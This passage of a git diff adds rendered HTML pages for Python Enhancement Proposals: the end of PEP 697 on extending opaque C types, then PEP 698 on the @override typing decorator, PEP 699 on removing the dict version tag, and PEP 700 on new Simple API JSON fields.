+type subclass:
+┌───────────────────┬──────────────┬─────────────┬───┬───┬╌╌╌╌┐
+│ PyObject_VAR_HEAD │Heap type data│subclass data│var. data   │
+└───────────────────┴──────────────┴─────────────┴───┴───┴╌╌╌╌┘
+
+
+

The first layout enables fast access to the items array. +The second allows subclasses to ignore the variable-sized array (assuming +they use offsets from the start of the object to access their data).

+

Since this PEP focuses on PyHeapTypeObject, it proposes an API to allow +subclassing for the second variant. +Support for the first can be added later as an API-compatible change +(though your PEP author doubts it’d be worth the effort).

+
+
+

Extending classes with the PyHeapTypeObject-like layout

+

This PEP proposes a type flag, Py_TPFLAGS_ITEMS_AT_END, which will indicate +the PyHeapTypeObject-like layout. +This can be set in two ways:

+
    +
  • the superclass can set the flag, allowing subclass authors to not care about +the fact that itemsize is involved, or
  • +
  • the new subclass sets the flag, asserting that the author knows the +superclass is suitable (but perhaps hasn’t been updated to use the flag yet).
  • +
+

This flag will be necessary to extend a variable-sized type using negative +basicsize.

+

An alternative to a flag would be to require subclass authors to know that the +base uses a compatible layout (e.g. from documentation). +A past version of this PEP proposed a new +PyType_Slot for it. +This turned out to be hard to explain, and goes against the idea of decoupling +the subclass from the base layout.

+

The new flag will be used to allow safely extending variable-sized types: +creating a type with spec->basicsize < 0 and base->tp_itemsize > 0 +will require the flag.

+

Additionally, this PEP proposes a helper function to get the variable-sized +data of a given instance, if it uses the new Py_TPFLAGS_ITEMS_AT_END flag. +This hides the necessary pointer arithmetic behind an API +that can potentially be adapted to other layouts in the future (including, +potentially, a VM-managed layout).

+
+
+

Big picture

+

To make it easier to verify that all cases are covered, here’s a scary-looking +big-picture decision tree.

+
+

Note

+

The individual cases are easier to explain in isolation (see the +reference implementation for draft docs).

+
+
    +
  • spec->basicsize > 0: No change to the status quo. (The base +class layout is known.)
  • +
  • spec->basicsize == 0: (Inheriting the basicsize)
      +
    • base->tp_itemsize == 0: The item size is set to spec->tp_itemsize. +(No change to status quo.)
    • +
    • base->tp_itemsize > 0: (Extending a variable-size class)
        +
      • spec->itemsize == 0: The item size is inherited. +(No change to status quo.)
      • +
      • spec->itemsize > 0: The item size is set. (This is hard to use safely, +but it’s CPython’s current behavior.)
      • +
      +
    • +
    +
  • +
  • spec->basicsize < 0: (Extending the basicsize)
      +
    • base->tp_itemsize == 0: (Extending a fixed-size class)
        +
      • spec->itemsize == 0: The item size is set to 0.
      • +
      • spec->itemsize > 0: Fail. (We’d need to add an ob_size, which is +only possible for trivial types – and the trivial layout must be known.)
      • +
      +
    • +
    • base->tp_itemsize > 0: (Extending a variable-size class)
        +
      • spec->itemsize == 0: (Inheriting the itemsize)
          +
        • Py_TPFLAGS_ITEMS_AT_END used: itemsize is inherited.
        • +
        • Py_TPFLAGS_ITEMS_AT_END not used: Fail. (Possible conflict.)
        • +
        +
      • +
      • spec->itemsize > 0: Fail. (Changing/extending the item size can’t be +done safely.)
      • +
      +
    • +
    +
  • +
+

Setting spec->itemsize < 0 is always an error. +This PEP does not propose any mechanism to extend tp->itemsize +rather than just inherit it.

+
+
+
+

Relative member offsets

+

One more piece of the puzzle is PyMemberDef.offset. +Extensions that use a subclass-specific struct (SubListState above) +will get a way to specify “relative” offsets (offsets based from this +struct) rather than “absolute” ones (based off the PyObject struct).

+

One way to do it would be to automatically assume “relative” offsets +when creating a class using the new API. +However, this implicit assumption would be too surprising.

+

To be more explicit, this PEP proposes a new flag for “relative” offsets. +At least initially, this flag will serve only as a check against misuse +(and a hint for reviewers). +It must be present if used with the new API, and must not be used otherwise.

+
+
+
+

Specification

+

In the code blocks below, only function headers are part of the specification. +Other code (the size/offset calculations) are details of the initial CPython +implementation, and subject to change.

+
+

Relative basicsize

+

The basicsize member of PyType_Spec will be allowed to be zero or +negative. +In that case, its absolute value will specify how much extra storage space +instances of the new class require, in addition to the basicsize of the +base class. +That is, the basicsize of the resulting class will be:

+
type->tp_basicsize = _align(base->tp_basicsize) + _align(-spec->basicsize);
+
+
+

where _align rounds up to a multiple of alignof(max_align_t).

+

When spec->basicsize is zero, basicsize will be inherited +directly instead, i.e. set to base->tp_basicsize without aligning. +(This already works; explicit tests and documentation will be added.)

+

On an instance, the memory area specific to a subclass – that is, the +“extra space” that subclass reserves in addition its base – will be available +through a new function, PyObject_GetTypeData. +In CPython, this function will be defined as:

+
void *
+PyObject_GetTypeData(PyObject *obj, PyTypeObject *cls) {
+    return (char *)obj + _align(cls->tp_base->tp_basicsize);
+}
+
+
+

Another function will be added to retrieve the size of this memory area:

+
Py_ssize_t
+PyType_GetTypeDataSize(PyTypeObject *cls) {
+    return cls->tp_basicsize - _align(cls->tp_base->tp_basicsize);
+}
+
+
+

The result may be higher than requested by -basicsize. It is safe to +use all of it (e.g. with memset).

+

The new *Get* functions come with an important caveat, which will be +pointed out in documentation: They may only be used for classes created using +negative PyType_Spec.basicsize. For other classes, their behavior is +undefined. +(Note that this allows the above code to assume cls->tp_base is not +NULL.)

+
+
+

Inheriting itemsize

+

When spec->itemsize is zero, tp_itemsize will be inherited +from the base. +(This already works; explicit tests and documentation will be added.)

+

A new type flag, Py_TPFLAGS_ITEMS_AT_END, will be added. +This flag can only be set on types with non-zero tp_itemsize. +It indicates that the variable-sized portion of an instance +is stored at the end of the instance’s memory.

+

The default metatype (PyType_Type) will set this flag.

+

A new function, PyObject_GetItemData, will be added to access the +memory reserved for variable-sized content of types with the new flag. +In CPython it will be defined as:

+
void *
+PyObject_GetItemData(PyObject *obj) {
+    if (!PyType_HasFeature(Py_TYPE(obj), Py_TPFLAGS_ITEMS_AT_END) {
+        <fail with TypeError>
+    }
+    return (char *)obj + Py_TYPE(obj)->tp_basicsize;
+}
+
+
+

This function will initially not be added to the Limited API.

+

Extending a class with positive base->itemsize using +negative spec->basicsize will fail unless Py_TPFLAGS_ITEMS_AT_END +is set, either on the base or in spec->flags. +(See Extending variable-size objects for a full explanation.)

+

Extending a class with positive spec->itemsize using negative +spec->basicsize will fail.

+
+
+

Relative member offsets

+

In types defined using negative PyType_Spec.basicsize, the offsets of +members defined via Py_tp_members must be relative to the +extra subclass data, rather than the full PyObject struct. +This will be indicated by a new flag in PyMemberDef.flags: +Py_RELATIVE_OFFSET.

+

In the initial implementation, the new flag will be redundant. It only serves +to make the offset’s changed meaning clear, and to help avoid mistakes. +It will be an error to not use Py_RELATIVE_OFFSET with negative +basicsize, and it will be an error to use it in any other context +(i.e. direct or indirect calls to PyDescr_NewMember, PyMember_GetOne, +PyMember_SetOne).

+

CPython will adjust the offset and clear the Py_RELATIVE_OFFSET flag when +initializing a type. +This means that:

+
    +
  • the created type’s tp_members will not match the input +definition’s Py_tp_members slot, and
  • +
  • any code that reads tp_members will not need to handle the flag.
  • +
+
+
+
+

List of new API

+

The following new functions/values are proposed.

+

These will be added to the Limited API/Stable ABI:

+
    +
  • void * PyObject_GetTypeData(PyObject *obj, PyTypeObject *cls)
  • +
  • Py_ssize_t PyType_GetTypeDataSize(PyTypeObject *cls)
  • +
  • Py_TPFLAGS_ITEMS_AT_END flag for PyTypeObject.tp_flags
  • +
  • Py_RELATIVE_OFFSET flag for PyMemberDef.flags
  • +
+

These will be added to the public C API only:

+
    +
  • void *PyObject_GetItemData(PyObject *obj)
  • +
+
+
+

Backwards Compatibility

+

No backwards compatibility concerns are known.

+
+
+

Assumptions

+

The implementation assumes that an instance’s memory +between type->tp_base->tp_basicsize and type->tp_basicsize offsets +“belongs” to type (except variable-length types). +This is not documented explicitly, but CPython up to version 3.11 relied on it +when adding __dict__ to subclasses, so it should be safe.

+
+
+

Security Implications

+

None known.

+
+
+

Endorsements

+

The author of pybind11 originally requested solving the issue +(see point 2 in this list), +and has been verifying the implementation.

+

Florian from the HPy project said +that the API looks good in general. +(See below for a possible solution to +performance concerns.)

+
+
+

How to Teach This

+

The initial implementation will include reference documentation +and a What’s New entry, which should be enough for the target audience +– authors of C extension libraries.

+
+
+

Reference Implementation

+

A reference implementation is in the extend-opaque branch +in the encukou/cpython GitHub repo.

+
+
+

Possible Future Enhancements

+
+

Alignment & Performance

+

The proposed implementation may waste some space if instance structs +need smaller alignment than alignof(max_align_t). +Also, dealing with alignment makes the calculation slower than it could be +if we could rely on base->tp_basicsize being properly aligned for the +subtype.

+

In other words, the proposed implementation focuses on safety and ease of use, +and trades space and time for it. +If it turns out that this is a problem, the implementation can be adjusted +without breaking the API:

+
    +
  • The offset to the type-specific buffer can be stored, so +PyObject_GetTypeData effectively becomes +(char *)obj + cls->ht_typedataoffset, possibly speeding things up at +the cost of an extra pointer in the class.
  • +
  • Then, a new PyType_Slot can specify the desired alignment, to +reduce space requirements for instances.
  • +
+
+
+

Other layouts for variable-size types

+

A flag like Py_TPFLAGS_ITEMS_AT_END could be added to signal the +“tuple-like” layout described in Extending variable-size objects, +and all mechanisms this PEP proposes could be adapted to support it. +Other layouts could be added as well. +However, it seems there’d be very little practical benefit, +so it’s just a theoretical possibility.

+
+
+
+

Rejected Ideas

+

Instead of a negative spec->basicsize, a new PyType_Spec flag could’ve +been added. The effect would be the same to any existing code accessing these +internals without up to date knowledge of the change as the meaning of the +field value is changing in this situation.

+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0697.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0698/index.html b/pep-0698/index.html new file mode 100644 index 00000000000..26c1ec99932 --- /dev/null +++ b/pep-0698/index.html @@ -0,0 +1,612 @@ + + + + + + + + PEP 698 – Override Decorator for Static Typing | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 698 – Override Decorator for Static Typing

+
+
Author:
+
Steven Troxler <steven.troxler at gmail.com>, +Joshua Xu <jxu425 at fb.com>, +Shannon Zhu <szhu at fb.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
05-Sep-2022
+
Python-Version:
+
3.12
+
Post-History:
+
20-May-2022, +17-Aug-2022, +11-Oct-2022, +07-Nov-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see @override and +@typing.override for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP proposes adding an @override decorator to the Python type system. +This will allow type checkers to prevent a class of bugs that occur when a base +class changes methods that are inherited by derived classes.

+
+
+

Motivation

+

A primary purpose of type checkers is to flag when refactors or changes break +pre-existing semantic structures in the code, so users can identify and make +fixes across their project without doing a manual audit of their code.

+
+

Safe Refactoring

+

Python’s type system does not provide a way to identify call sites that need to +be changed to stay consistent when an overridden function API changes. This +makes refactoring and transforming code more dangerous.

+

Consider this simple inheritance structure:

+
class Parent:
+    def foo(self, x: int) -> int:
+        return x
+
+class Child(Parent):
+    def foo(self, x: int) -> int:
+        return x + 1
+
+def parent_callsite(parent: Parent) -> None:
+    parent.foo(1)
+
+def child_callsite(child: Child) -> None:
+    child.foo(1)
+
+
+

If the overridden method on the superclass is renamed or deleted, type checkers +will only alert us to update call sites that deal with the base type directly. +But the type checker can only see the new code, not the change we made, so it +has no way of knowing that we probably also needed to rename the same method on +child classes.

+

A type checker will happily accept this code, even though we are likely +introducing bugs:

+
class Parent:
+    # Rename this method
+    def new_foo(self, x: int) -> int:
+        return x
+
+class Child(Parent):
+    # This (unchanged) method used to override `foo` but is unrelated to `new_foo`
+    def foo(self, x: int) -> int:
+        return x + 1
+
+def parent_callsite(parent: Parent) -> None:
+    # If we pass a Child instance we’ll now run Parent.new_foo - likely a bug
+    parent.new_foo(1)
+
+def child_callsite(child: Child) -> None:
+    # We probably wanted to invoke new_foo here. Instead, we forked the method
+    child.foo(1)
+
+
+

This code will type check, but there are two potential sources of bugs:

+
    +
  • If we pass a Child instance to the parent_callsite function, it will +invoke the implementation in Parent.new_foo. rather than Child.foo. +This is probably a bug - we presumably would not have written Child.foo in +the first place if we didn’t need custom behavior.
  • +
  • Our system was likely relying on Child.foo behaving in a similar way to +Parent.foo. But unless we catch this early, we have now forked the +methods, and in future refactors it is likely no one will realize that major +changes to the behavior of new_foo likely require updating Child.foo as +well, which could lead to major bugs later.
  • +
+

The incorrectly-refactored code is type-safe, but is probably not what we +intended and could cause our system to behave incorrectly. The bug can be +difficult to track down because our new code likely does execute without +throwing exceptions. Tests are less likely to catch the problem, and silent +errors can take longer to track down in production.

+

We are aware of several production outages in multiple typed codebases caused by +such incorrect refactors. This is our primary motivation for adding an @override +decorator to the type system, which lets developers express the relationship +between Parent.foo and Child.foo so that type checkers can detect the problem.

+
+
+
+

Rationale

+
+

Subclass Implementations Become More Explicit

+

We believe that explicit overrides will make unfamiliar code easier to read than +implicit overrides. A developer reading the implementation of a subclass that +uses @override can immediately see which methods are overriding +functionality in some base class; without this decorator, the only way to +quickly find out is using a static analysis tool.

+
+
+

Precedent in Other Languages and Runtime Libraries

+
+

Static Override Checks in Other Languages

+

Many popular programming languages support override checks. For example:

+ +
+
+

Runtime Override Checks in Python

+

Today, there is an Overrides library +that provides decorators @overrides [sic] and @final and will enforce +them at runtime.

+

PEP 591 added a @final decorator with the same semantics as those in the +Overrides library. But the override component of the runtime library is not +supported statically at all, which has added some confusion around the +mix/matched support.

+

Providing support for @override in static checks would add value because:

+
    +
  • Bugs can be caught earlier, often in-editor.
  • +
  • Static checks come with no performance overhead, unlike runtime checks.
  • +
  • Bugs will be caught quickly even in rarely-used modules, whereas with runtime +checks these might go undetected for a time without automated tests of all +imports.
  • +
+
+
+
+

Disadvantages

+

Using @override will make code more verbose.

+
+
+
+

Specification

+

When type checkers encounter a method decorated with @typing.override they +should treat it as a type error unless that method is overriding a compatible +method or attribute in some ancestor class.

+
from typing import override
+
+class Parent:
+    def foo(self) -> int:
+        return 1
+
+    def bar(self, x: str) -> str:
+        return x
+
+class Child(Parent):
+    @override
+    def foo(self) -> int:
+        return 2
+
+    @override
+    def baz(self) -> int:  # Type check error: no matching signature in ancestor
+        return 1
+
+
+

The @override decorator should be permitted anywhere a type checker +considers a method to be a valid override, which typically includes not only +normal methods but also @property, @staticmethod, and @classmethod.

+
+

No New Rules for Override Compatibility

+

This PEP is exclusively concerned with the handling of the new @override decorator, +which specifies that the decorated method must override some attribute in +an ancestor class. This PEP does not propose any new rules regarding the type +signatures of such methods.

+
+
+
+

Strict Enforcement Per-Project

+

We believe that @override is most useful if checkers also allow developers +to opt into a strict mode where methods that override a parent class are +required to use the decorator. Strict enforcement should be opt-in for backward +compatibility.

+
+

Motivation

+

The primary reason for a strict mode that requires @override is that developers +can only trust that refactors are override-safe if they know that the @override +decorator is used throughout the project.

+

There is another class of bug related to overrides that we can only catch using a strict mode.

+

Consider the following code:

+
class Parent:
+    pass
+
+class Child(Parent):
+    def foo(self) -> int:
+        return 2
+
+
+

Imagine we refactor it as follows:

+
class Parent:
+    def foo(self) -> int:   # This method is new
+        return 1
+
+class Child(Parent):
+    def foo(self) -> int:  # This is now an override!
+        return 2
+
+def call_foo(parent: Parent) -> int:
+    return parent.foo()  # This could invoke Child.foo, which may be surprising.
+
+
+

The semantics of our code changed here, which could cause two problems:

+
    +
  • If the author of the code change did not know that Child.foo already +existed (which is very possible in a large codebase), they might be surprised +to see that call_foo does not always invoke Parent.foo.
  • +
  • If the codebase authors tried to manually apply @override everywhere when +writing overrides in subclasses, they are likely to miss the fact that +Child.foo needs it here.
  • +
+

At first glance this kind of change may seem unlikely, but it can actually +happen often if one or more subclasses have functionality that developers later +realize belongs in the base class.

+

With a strict mode, we will always alert developers when this occurs.

+
+
+

Precedent

+

Most of the typed, object-oriented programming languages we looked at have an +easy way to require explicit overrides throughout a project:

+
    +
  • C#, Kotlin, Scala, and Swift always require explicit overrides
  • +
  • TypeScript has a +–no-implicit-override +flag to force explicit overrides
  • +
  • In Hack and Java the type checker always treats overrides as opt-in, but +widely-used linters can warn if explicit overrides are missing.
  • +
+
+
+
+

Backward Compatibility

+

By default, the @override decorator will be opt-in. Codebases that do not +use it will type-check as before, without the additional type safety.

+
+
+

Runtime Behavior

+
+

Set __override__ = True when possible

+

At runtime, @typing.override will make a best-effort attempt to add an +attribute __override__ with value True to its argument. By “best-effort” +we mean that we will try adding the attribute, but if that fails (for example +because the input is a descriptor type with fixed slots) we will silently +return the argument as-is.

+

This is exactly what the @typing.final decorator does, and the motivation +is similar: it gives runtime libraries the ability to use @override. As a +concrete example, a runtime library could check __override__ in order +to automatically populate the __doc__ attribute of child class methods +using the parent method docstring.

+
+
+

Limitations of setting __override__

+

As described above, adding __override__ may fail at runtime, in which +case we will simply return the argument as-is.

+

In addition, even in cases where it does work, it may be difficult for users to +correctly work with multiple decorators, because successfully ensuring the +__override__ attribute is set on the final output requires understanding the +implementation of each decorator:

+
    +
  • The @override decorator needs to execute after ordinary decorators +like @functools.lru_cache that use wrapper functions, since we want to +set __override__ on the outermost wrapper. This means it needs to +go above all these other decorators.
  • +
  • But @override needs to execute before many special descriptor-based +decorators like @property, @staticmethod, and @classmethod.
  • +
  • As discussed above, in some cases (for example a descriptor with fixed +slots or a descriptor that also wraps) it may be impossible to set the +__override__ attribute at all.
  • +
+

As a result, runtime support for setting __override__ is best effort +only, and we do not expect type checkers to validate the ordering of +decorators.

+
+
+
+

Rejected Alternatives

+
+

Rely on Integrated Development Environments for safety

+

Modern Integrated Development Environments (IDEs) often provide the ability to +automatically update subclasses when renaming a method. But we view this as +insufficient for several reasons:

+
    +
  • If a codebase is split into multiple projects, an IDE will not help and the +bug appears when upgrading dependencies. Type checkers are a fast way to catch +breaking changes in dependencies.
  • +
  • Not all developers use such IDEs. And library maintainers, even if they do use +an IDE, should not need to assume pull request authors use the same IDE. We +prefer being able to detect problems in continuous integration without +assuming anything about developers’ choice of editor.
  • +
+
+
+

Runtime enforcement

+

We considered having @typing.override enforce override safety at runtime, +similarly to how @overrides.overrides +does today.

+

We rejected this for four reasons:

+
    +
  • For users of static type checking, it is not clear this brings any benefits.
  • +
  • There would be at least some performance overhead, leading to projects +importing slower with runtime enforcement. We estimate the +@overrides.overrides implementation takes around 100 microseconds, which +is fast but could still add up to a second or more of extra initialization +time in million-plus line codebases, which is exactly where we think +@typing.override will be most useful.
  • +
  • An implementation may have edge cases where it doesn’t work well (we heard +from a maintainer of one such closed-source library that this has been a +problem). We expect static enforcement to be simple and reliable.
  • +
  • The implementation approaches we know of are not simple. The decorator +executes before the class is finished evaluating, so the options we know of +are either to inspect the bytecode of the caller (as @overrides.overrides +does) or to use a metaclass-based approach. Neither approach seems ideal.
  • +
+
+
+

Mark a base class to force explicit overrides on subclasses

+

We considered including a class decorator @require_explicit_overrides, which +would have provided a way for base classes to declare that all subclasses must +use the @override decorator on method overrides. The +Overrides library has a mixin class, +EnforceExplicitOverrides, which provides similar behavior in runtime checks.

+

We decided against this because we expect owners of large codebases will benefit +most from @override, and for these use cases having a strict mode where +explicit @override is required (see the Backward Compatibility section) +provides more benefits than a way to mark base classes.

+

Moreover we believe that authors of projects who do not consider the extra type +safety to be worth the additional boilerplate of using @override should not +be forced to do so. Having an optional strict mode puts the decision in the +hands of project owners, whereas the use of @require_explicit_overrides in +libraries would force project owners to use @override even if they prefer +not to.

+
+
+

Include the name of the ancestor class being overridden

+

We considered allowing the caller of @override to specify a specific +ancestor class where the overridden method should be defined:

+
class Parent0:
+    def foo(self) -> int:
+        return 1
+
+
+class Parent1:
+    def bar(self) -> int:
+        return 1
+
+
+class Child(Parent0, Parent1):
+    @override(Parent0)  # okay, Parent0 defines foo
+    def foo(self) -> int:
+        return 2
+
+    @override(Parent0)  # type error, Parent0 does not define bar
+    def bar(self) -> int:
+        return 2
+
+
+

This could be useful for code readability because it makes the override +structure more explicit for deep inheritance trees. It also might catch bugs by +prompting developers to check that the implementation of an override still makes +sense whenever a method being overridden moves from one base class to another.

+

We decided against it because:

+
    +
  • Supporting this would add complexity to the implementation of both +@override and type checker support for it, so there would need to +be considerable benefits.
  • +
  • We believe that it would be rarely used and catch relatively few bugs.
      +
    • The author of the +Overrides package has +noted +that early versions of his library included this capability but it was +rarely useful and seemed to have little benefit. After it was removed, the +ability was never requested by users.
    • +
    +
  • +
+
+
+
+

Reference Implementation

+

Pyre: A proof of concept is implemented in Pyre:

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0698.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0699/index.html b/pep-0699/index.html new file mode 100644 index 00000000000..a1ca56397e9 --- /dev/null +++ b/pep-0699/index.html @@ -0,0 +1,226 @@ + + + + + + + + PEP 699 – Remove private dict version field added in PEP 509 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 699 – Remove private dict version field added in PEP 509

+
+
Author:
+
Ken Jin <kenjin at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Created:
+
03-Oct-2022
+
Python-Version:
+
3.12
+
Post-History:
+
05-Oct-2022
+
Replaces:
+
509
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 509 introduced a private ma_version_tag field for dictionaries to +allow optimizations in CPython and extension libraries. This PEP proposes to +rescind PEP 509 and declare the field an implementation detail, as it has +already been superseded by alternatives. This will further allow the field to +be reused for future optimization.

+
+
+

Motivation

+

PEP 509 introduced the ma_version_tag field to dictionaries. This 64-bit +field stored a version counter that updates every time a dictionary was +modified. The original proposal was to use this version counter as a +guard for optimizations.

+

Since CPython 3.11, this field has become unused by internal optimization +efforts. PEP 659-specialized instructions use other methods of verifying +that certain optimizations are safe.

+

To enable further optimizations in CPython, this PEP proposes that the +ma_version_tag field no longer conform to the PEP 509 specification. +This will allow the CPython developers to store other optimization information, +such as dictionary write watchers.

+
+
+

Rationale

+

This PEP does not specify what the field may be used for in the future. This is +intentional, as implementation details are subject to change, and the field +should be used only for internal consumption by CPython.

+
+
+

Specification

+

This specification rescinds that in PEP 509. The ma_version_tag field of +the Python dict class is declared to be an internal implementation +detail and may be removed altogether, or may have a different representation. +C extensions should not rely on this field.

+
+
+

Backwards Compatibility

+

Certain extensions use ma_version_tag for fast dictionary or globals +lookups. For example, +Cython uses the field for fast dynamic module variable lookups.

+

This PEP proposes to emit a compiler warning when accessing ma_version_tag. +After two consecutive version releases with warnings, ma_version_tag +will be removed, in line with PEP 387.

+

The biggest user the author could find for this field was Cython. +Discussions with a Cython maintainer indicated that +removing support for it from Cython is trivial.

+
+
+

Security Implications

+

PEP 509 was concerned with integer overflow. However, this PEP does not +introduce any additional security concerns.

+
+
+

Rejected Ideas

+

A possible alternative is to preserve the field for backwards compatibility. +This PEP rejects that alternative as future optimizations will consume more +memory, and the field was always considered private and undocumented aside +from the PEP, with no backward compatibility guarantees. Dictionaries in Python +are commonly used, and any increase in their memory consumption will adversely +affect Python’s performance.

+
+
+

Reference Implementation

+

A reference implementation can be found in +python/cpython#101193.

+
+
+

Special Thanks

+

Thanks to C.A.M. Gerlach for edits and wording changes to this document. +Thanks also to Mark Shannon and Kumar Aditya for providing possible +implementations.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0699.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0700/index.html b/pep-0700/index.html new file mode 100644 index 00000000000..4afeec54c78 --- /dev/null +++ b/pep-0700/index.html @@ -0,0 +1,315 @@ + + + + + + + + PEP 700 – Additional Fields for the Simple API for Package Indexes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 700 – Additional Fields for the Simple API for Package Indexes

+
+
Author:
+
Paul Moore <p.f.moore at gmail.com>
+
PEP-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
21-Oct-2022
+
Post-History:
+
21-Oct-2022
+
Resolution:
+
19-Dec-2022
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Simple repository API, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

PEP 691 defined a JSON form for the “Simple Repository API”. This allowed +clients to more easily query the data that was previously only available in +HTML, as defined in PEP 503.

+

This proposal adds three fields to the JSON form, which allow it to be used in +place of PyPI’s JSON API +in a number of situations.

+
    +
  • A field to allow retrieval of a list of all the published versions of a project.
  • +
  • Fields containing the size and upload time for a project file.
  • +
+

The new fields are all part of the data returned from the “project details” URL.

+
+
+

Rationale

+

With the introduction of the JSON form of the simple API in PEP 691, the +simple API offers functionality that is almost as complete as the PyPI JSON API. +This PEP adds a number of fields which were previously only available through +the JSON API, in order to allow more clients which were previously Warehouse +specific to support arbitrary standards-compliant indexes.

+
+
+

Specification

+

This specification defines version 1.1 of the simple repository API. For the +HTML version of the API, there is no change from version 1.0. For the JSON +version of the API, the following changes are made:

+
    +
  • The api-version must specify version 1.1 or later.
  • +
  • A new versions key is added at the top level.
  • +
  • Two new “file information” keys, size and upload-time, are added to +the files data.
  • +
  • Keys (at any level) with a leading underscore are reserved as private for +index server use. No future standard will assign a meaning to any such key.
  • +
+

The versions and size keys are mandatory. The upload-time key is +optional.

+
+

Versions

+

An additional key, versions MUST be present at the top level, in addition to +the keys name, files and meta defined in PEP 691. This key MUST +contain a list of version strings specifying all of the project versions uploaded +for this project. The value is logically a set, and as such may not contain +duplicates, and the order of the values is not significant.

+

All of the files listed in the files key MUST be associated with one of the +versions in the versions key. The versions key MAY contain versions with +no associated files (to represent versions with no files uploaded, if the server +has such a concept).

+

Note that because servers may hold “legacy” data from before the adoption of +PEP 440, version strings currently cannot be required to be valid PEP 440 +versions, and therefore cannot be assumed to be orderable using the PEP 440 +rules. However, servers SHOULD use normalised PEP 440 versions where +possible.

+
+
+

Additional file information

+

Two new keys are added to the files key.

+
    +
  • size: This field is mandatory. It MUST contain an integer which is the +file size in bytes.
  • +
  • upload-time: This field is optional. If present, it MUST contain a valid +ISO 8601 date/time string, in the format yyyy-mm-ddThh:mm:ss.ffffffZ, +which represents the time the file was uploaded to the index. As indicated by +the Z suffix, the upload time MUST use the UTC timezone. The fractional +seconds part of the timestamp (the .ffffff part) is optional, and if +present may contain up to 6 digits of precision. If a server does not record +upload time information for a file, it MAY omit the upload-time key.
  • +
+
+
+
+

FAQ

+
+

Why not add this data to the HTML API as well?

+

It would be possible to add the data to the HTML API, but the vast majority of +consumers for this data are likely to be currently getting it from the PyPI JSON +API, and so will already be expecting to parse JSON. Traditional consumers of +the HTML API have never needed this data previously.

+
+
+

Does this imply that the HTML API is obsolete?

+

No. The FAQ of PEP 691 was clear that the HTML API is not being deprecated, +and this PEP does not change that position. However, clients wishing to access +the new data introduced by this PEP will need to use the JSON API to get it. And +indexes wanting to provide it will need to serve the JSON format.

+
+
+

Is the simple API replacing the Warehouse JSON and XML-RPC APIs?

+

Where possible, clients should prefer the simple API over the JSON or XML-RPC +APIs, as the former is standardised and can be assumed to be available from any +index, whereas the latter are exclusive to the Warehouse project.

+

However, while this PEP brings the simple API closer to being able to replace +the JSON API, there is no formal policy that the simple API will replicate all +of the functionality covered by the existing Warehouse APIs. Proposed additions +to the simple API will still be considered on their individual merits, and the +requirement that the API should be simple and fast for the primary use case of +locating files for a project will remain the overriding consideration.

+
+
+

Why not allow other date formats?

+

The ISO 8601 standard is complex, and there seems little value in requiring +clients to deal with that. The standard library datetime module provides +methods to parse ISO 8601 strings, but it is possible that users may want to +access index data without using Python (for example, piping the output of +curl into jq). Having a single, well-defined format makes this easier, +and doesn’t have any significant disadvantages.

+
+
+

What if file sizes are too big for a JSON number?

+

The JSON standard does not specify how numbers are to be interpreted. Python can +read and write arbitrary-length integers in a JSON file, so this should not be +an issue for code written in Python. Non-Python implementations may need to take +care to handle large integers correctly, but this is not expected to be a +significant problem.

+
+
+

Why not require PEP 440 versions?

+

At the time this PEP was written, PyPI still contains (and serves) projects and +files with “legacy” versions. Requiring PEP 440 versions would make it +impossible for PyPI to follow this specification while still serving the +existing content.

+

Ideally, at some future time, the simple index API will be updated to require +PEP 440 versions, at which time this specification should be updated to +reflect that. However, that change will need to be co-ordinated with existing +index providers including PyPI, to desupport and remove non-conforming projects +and/or files.

+
+
+

Why not provide a “latest version” value?

+

For PEP 440 versions, this is easy enough for the client to do (using the +packaging library, latest = max(Version(s) for s in proj["versions"])). +For non-standard versions, there is no well-defined ordering, and clients will +need to decide on what rule is appropriate for their needs. Requiring the server +to supply a latest version value takes the choice away from the client.

+

Servers with an explicit concept of which version is the “latest”, which cannot +be calculated from data available to the client, can provide a non-standard, +underscore-prefixed key to convey that information to the client if they wish.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0700.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
